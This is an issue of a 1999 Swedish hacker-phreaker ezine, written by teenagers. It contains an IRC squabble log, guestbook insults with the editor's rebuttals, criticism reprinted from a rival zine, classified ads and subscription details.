o----------------------------------------------------------------------o

<Alexz> vad heter du eller

<Knash^> knash

<Alexz> Allvarligt

<Knash^> spelar roll.

<Alexz> Moget

<Knash^> varför sprida ut namn och var man bor utan anledning ?

<Alexz> det var la roligt

<Knash^> finns ingen som helst anledning att sprida person uppgifter.

<Alexz> va sa du

<Knash^> text har ingenting med hörsel att göra

<Alexz> Va sa du

<Knash^> Gör det något om jag publicerar denna .log i ett ezine som har typ 

         200 prenumeraner ?

<Knash^> Under artikeln "Dagens MEGA Lamer"

<Alexz> DRA.....din nöt

<Alexz> själ då...LAMER

<Knash^> Du vet nog själv inte vad defintionen av en lamer är.

<Alexz> Du är en sådan

<Alexz> va sa du

<Knash^> ehh..nej knappast.

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Knash^> heh..Du kan ju själv inte förklara.

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> Jooooooooooooooooooooooooooooooooooooooooooooooooooooooo

<Alexz> din jävla data-nörd

<Knash^> klart man är.

<Knash^> vad gör du på #swehack egentligen ?

<Alexz> skit i det du

<Knash^> där gick det slut på nerverna igen. Du får ju inget att säga.

<Alexz> dra

<Knash^> ja det e lugnt.

<Knash^> Hejdå

<Alexz> baj baj

<Knash^> Fan vad alla läsare kommer att garva.

<Alexz> varrå

<Knash^> loggen kommer ju att publiceras i en tidning.



o----------------------------------------------------------------------o

¦ Tänker_bakvänt.log                                             knash ¦

o----------------------------------------------------------------------o

Ett bra tag har någon person vid namn tty i Heretics Inc's guestbook  på

www.heretics.cjb.net, klagat  grymt  mycket på oss. Jag ska ta  med alla

messages han har skrivit här.



Date: 29.1.99/21:37

tty (no email / no homepage ) wrote: 

livet går inte ut på en snygg site och att sno texter från nätet era 

smurfar.



> Och vad har det med oss att göra ?

> Vi har inte påstått att det ovan är livets mening.

> Vi snor inte texter från nätet.









Date: 31.1.99/15:53

tty 

ni kan inte stava



> Jo det kan vi visst. Men i ezinet spelar det inte så ->>JÄTTE<<- stor

> roll eftersom folk kan leva med sådant.









Date: 18.2.99/8:41

tty 

ni är en sammling newbies,vem som helst kan för fan

bygga och använda en lmhs era smurfar.

hur gammla är ni? 14? och era projekt är för det mesta fantasi!



> Ni är en samling newbies: Ja men däremot inte alla.

> Vi har inte skrivit en enda text om hur man bygger en LMHS.

> vi är 13-18 år.

> Projekt, fantasi..Skitsnack









Date: 18.2.99/15:45

tty 

point nolla: du kommer också gå upp i rök så lam som du är. 



> Shh..p01nt lam, det är även det skitsnack du känner ju inte

> ens personen. Han är ju för fan mobiltelefoni system expert.











Date: 24.2.99/2:28

tty 

Aemkey,jag ger dig priset för att vara lamast av alla.



> och hur fan ska du veta om han är lam eller inte. Han kanske är en

> l33t haxxor som du skulle ha sagt.





Om du läser detta så tänke jag passa på att fråga ett par saker. Vem är?

är du tty-x på #swehack eller?

Du ska aldrig kalla någon lamer när du inte vet  om personen är det..Jag

är inte en  lamer, i vissa  fall  kanske  jag  är  det. Det  stor  jävla

skillnad på lamer och på  lamer  och  newbie. En  lamer sitte  och leker

duktig med programmet Netbus som han laddat  ner  från  cyberrymden  (en

lamer skulle utrycka det så) En Newbie är en som vill lära sig  och  har

lust att lära sig. Han sitter och läser och om han inte fattar så frågar

han folk.



o----------------------------------------------------------------------o

¦ VSP kritiserar                                                 knash ¦

o----------------------------------------------------------------------o

Vanliga Svenska Priikers tycker Outlaw Informativa  är  helt  värdelöst.

Men för fan, vi är inte värdelösa..vi är kewla, vi är ett  gäng  newbies

va fan, dock iofs inte  alla. Men  jag  är, just  fyllt  14. Sluta klaga

och tänkt på vad ni sysslar med själva istället.



<--Nedan: Klippt från Vanliga Svenska Priikers #7-->



OUTLAW INFORMATIVA

Definition : H/P/A/V/C, musik

Utg.Status : Utkommer (uppföljare till T-SueZ)

E-mail adr : knash@linux.nu

HemsideURL : http://www.heretics.cjb.net

Utg.Nummer : 0-2



HAAAAAAAHHAHAOHOHE. misslyckat. 1an va ful 2an va dödstöten. lägg ner.



<--Ovan: Klippt från Vanliga Svenska Priikers #7-->







Nepp, han har inte rippat. Han har ju klart inte hittat ord och stuff

till allt. Men egentligen, information är ju gratis!! spelar roll om

han har rippat eller inte. Lägg ner :-O









<--Nedan: Klippt från Vanliga Svenska Priikers #7-->



hoho, jag måste fan bara klaga lite. Jag råkade en gång läsa en textfil

av en som kallar sig crazy train, stackars liten.. Iaf, här kommer ett 

utdrag ur texten så fattar ni nog vad jag menar.

"A-335  telefonväxelsystem är en digital växel som utvecklats genom det

av  Ericsson  och televerkskoncernerna gemensamägda företaget Ellemtel

utveckling  AB."

Vem faan bryr sig om vem som som äger vem?!? 1:a kopierings-alarmet 

tjuter.

Detta är säkert kopierat av ett svenskt telebolags manual.

"Signifikant  för  den programmeringsstyrda abonnentväxeln A-335 är att 

den bara har två överordnade enhetstyper vilka benäms linjemoduler och 

gruppväljare."

Jag tror visst vi har en liten akademiker här. Skriver en tonåring så här?

NEJ.

"Transmissionsprincipen är  TDM (TIME  DIVISION  MULTIPLEXING).  Mellan 

växelns linjeanslutningskort och den digitala  telefonapparaten  sänds 

informationen växelvis i form av digitalskurar."

Säger du det säger du det? Detta är ju fan pinsamt.

Det jag vill säga är att fasten den svenska phreaking-scenen är liten så

finns det ändå personer som ägnar sig åt att kopiera filer hit och dit och

sedan sätta sitt nick längst ner. Fy fan vad sugigt. Och om du ändå ska

kopieranågot, lägg iaf ner lite tid på att få det att se ut som du

själv har skrivitdet, jävla loser.



<--Ovan: Klippt från Vanliga Svenska Priikers #7-->



o----------------------------------------------------------------------o

¦ Köpes och Säljes                                                     ¦

o----------------------------------------------------------------------o



Köpes:



Flashback tidningar köpes

pris dikuteras

nilssonmarcus@hotmail.com



CD:

Mark oh - Never stop that feeling

Pris diskuteras

aemkey@usa.net



o----------------------------------------------------------------------o

¦ Copyright                                                            ¦

o----------------------------------------------------------------------o

Du  får  sprida  denna information via bbs:er, ftp, din hemsdia, cdromz,

floppyz och annan lagringmedia så länge informationen stannar oändrad...

har du problem med att läsa  zinet  så  skicka  ett  mail  till  mig  på

knash@linux.nu och säg vad felet är. Txtfilen ska läsas  med  monospace-

typsnitt annars funkar det inte. Annars blir den rumpa.



o----------------------------------------------------------------------o

¦ Prenumeration                                                        ¦

o----------------------------------------------------------------------o

Starta Prenumeration:

 Email  : knash@linux.nu

 Subjekt: Subscribe O-I

 

Avsluta Prenumeration:

 Email  : knash@linux.nu

 Subjekt: Unsubscribe O-I





 ¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^¤o*^



       ___       ___       ___       ___       ___       ___   

      /\  \     /\__\     /\  \     /\__\     /\  \     /\__\  

     /::\  \   /:/ _/_    \:\  \   /:/  /    /::\  \   /:/\__\ 

    /:/\:\__\ /:/_/\__\   /::\__\ /:/__/    /::\:\__\ /:/:/\__\

    \:\/:/  / \:\/:/  /  /:/\/__/ \:\  \    \/\::/  / \::/:/  /

     \::/  /   \::/  /   \/__/     \:\__\     /:/  /   \::/  / 

      \/__/     \/__/               \/__/     \/__/     \/__/



       Redaktör: Knash  | knash@linux.nu



       Hemsida: http://www.heretics.cjb.net

       IRC: #Phreak.se, #Programming.se @ DALnet (irc.dal.net)

 



 



